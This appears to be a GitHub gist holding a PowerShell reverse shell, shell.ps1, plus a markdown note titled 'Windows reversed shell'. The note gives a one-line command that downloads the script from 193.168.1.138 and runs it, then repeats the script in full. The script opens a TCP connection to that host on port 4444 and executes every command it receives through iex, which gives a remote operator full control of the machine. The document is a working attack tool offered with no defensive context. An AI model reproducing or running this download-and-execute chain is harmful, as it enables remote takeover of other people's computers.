11philip22/shell.ps1

## shell.ps1
$lhost="193.168.1.138";
$lport=4444;
$MAXCMDLENGTH=65535;
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();
$bytes = (New-Object byte[] $MAXCMDLENGTH);
$out = ([text.encoding]::ASCII).GetBytes("PS $($pwd.Path)> ");
$stream.Write($out, 0, $out.Length);
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $in = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
    try {
        $out = (iex $in 2>&1 | Out-String);
    }
    catch {
        $out = ($_ | Out-String);
    }
    $out = "$($out)PS $($pwd.Path)> ";
    $out = ([Text.Encoding]::ASCII).GetBytes($out);
    $stream.Write($out, 0, $out.Length);
    $stream.Flush();
}
$client.Close();

## windows-reversed-shell.md

      
    Raw
  

              windows-reversed-shell.md
            
          
    Windows reversed shell

execute

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://193.168.1.138/shell.ps1')"
	$lhost="193.168.1.138";
	$lport=4444;
	$MAXCMDLENGTH=65535;
	$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
	$stream = $client.GetStream();
	$bytes = (New-Object byte[] $MAXCMDLENGTH);
	$out = ([text.encoding]::ASCII).GetBytes("PS $($pwd.Path)> ");
	$stream.Write($out, 0, $out.Length);
	while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
	$in = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
	try {
	$out = (iex $in 2>&1 \| Out-String);
	}
	catch {
	$out = ($_ \| Out-String);
	}
	$out = "$($out)PS $($pwd.Path)> ";
	$out = ([Text.Encoding]::ASCII).GetBytes($out);
	$stream.Write($out, 0, $out.Length);
	$stream.Flush();
	}
	$client.Close();